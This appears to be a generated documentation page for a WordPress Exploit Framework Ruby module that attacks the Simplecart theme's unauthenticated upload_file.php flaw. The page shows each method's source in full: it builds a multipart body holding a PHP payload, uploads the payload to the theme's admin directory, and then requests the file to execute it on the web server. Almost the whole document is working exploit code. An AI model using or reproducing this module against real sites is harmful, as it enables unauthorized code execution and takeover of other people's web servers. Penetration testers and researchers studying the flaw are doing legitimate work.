class Wpxf::Exploit::SimplecartShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/exploit/shell/simplecart_shell_upload.rb, line 8 def initialize super update_info( name: 'Simplecart Theme Shell Upload', desc: 'This module exploits a file upload vulnerability in all versions '\ 'of the Simplecart theme found in the upload_file.php script '\ 'which contains no session or file validation. It allows '\ 'unauthenticated users to upload files of any type and '\ 'subsequently execute PHP scripts in the context of the '\ 'web server.', author: [ 'Divya', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['EDB', '36611'] ], date: 'April 02 2015' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/simplecart_shell_upload.rb, line 30 def check check_theme_version_from_readme('simplecart') end
payload_body_builder(payload_name)
click to toggle source
# File lib/wpxf/modules/exploit/shell/simplecart_shell_upload.rb, line 46 def payload_body_builder(payload_name) target_ip = IPSocket.getaddress(target_host) field_name = Utility::Text.md5(target_ip) builder = Utility::BodyBuilder.new builder.add_file_from_string(field_name, payload.encoded, payload_name) builder.add_field('upload_path', 'Lg==') builder end
plugin_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/simplecart_shell_upload.rb, line 34 def plugin_url normalize_uri(wordpress_url_themes, 'simplecart') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/simplecart_shell_upload.rb, line 56 def run return false unless super emit_info 'Preparing payload...' payload_name = "#{Utility::Text.rand_alpha(10, :lower)}.php" builder = payload_body_builder(payload_name) emit_info 'Uploading payload...' res = nil builder.create do |body| res = execute_post_request(url: uploader_url, body: body) end if res.nil? emit_error 'No response from the target' return false end if res.code != 200 emit_error "Server responded with code #{res.code}" return false end payload_url = normalize_uri(uploads_url, payload_name) emit_success "Uploaded the payload to #{payload_url}", true emit_info 'Executing the payload...' res = execute_get_request(url: payload_url) if res && res.code == 200 && !res.body.strip.empty? emit_success "Result: #{res.body}" end return true end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/simplecart_shell_upload.rb, line 42 def uploader_url normalize_uri(uploads_url, 'upload-file.php') end
uploads_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/simplecart_shell_upload.rb, line 38 def uploads_url normalize_uri(plugin_url, 'admin',) end